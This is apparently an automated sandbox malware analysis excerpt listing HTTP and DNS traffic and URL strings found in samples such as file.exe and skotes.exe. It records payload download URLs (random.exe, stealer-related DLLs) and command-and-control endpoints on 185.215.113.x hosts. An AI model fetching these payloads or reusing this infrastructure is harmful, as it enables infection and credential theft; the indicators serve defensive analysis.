Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 05:07:27 GMTIf-None-Match: "6732e28f-1bb600"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log6.8.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log6.8.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log6.8.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic	DNS traffic detected: DNS query: r.msftstatic.com

Source: unknown

Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe78
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeQ
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe0
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe1395d7f
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeW
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0?P
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll38
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllE8
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllJ6%
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllW8
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllK8
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dlle7
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllRS
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/8
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/D
Source: file.exe, 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2571406052.00000000232B2000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000171B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.h
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/$
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Yk
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/l
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/s
Source: file.exe, 00000000.00000002.2546281725.0000000000606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php003
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:k
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpFh
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpWk
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpY
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpb
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpbh
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpows
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp#Xl
Source: file.exe, 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpq
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpvh
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
Source: file.exe, 00000000.00000002.2571406052.00000000232B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ockedCacheCounterMutex
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/sonation
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/u
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/urrentVersion
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206C
Source: file.exe, 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206T
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206UC
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid1
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7001
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpM
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpV
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded;
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpk
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedh
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/lfons
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ows
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_474.4.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2580653028.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FCFBAKJD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_476.4.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_476.4.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: Reporting and NEL.9.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: chromecache_474.4.dr, chromecache_476.4.dr	String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.9.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://c.msn.com/
Source: FCFBAKJD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4bb3cbda-4223-42eb-9166-e2269eaddeda.tmp.9.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.8.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 4bb3cbda-4223-42eb-9166-e2269eaddeda.tmp.9.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_476.4.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_476.4.dr	String found in binary or memory: https://content.googleapis.com
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Reporting and NEL.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report
Source: 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json.8.dr	String found in binary or memory: https://docs.google.com/
Source: chromecache_476.4.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json.8.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
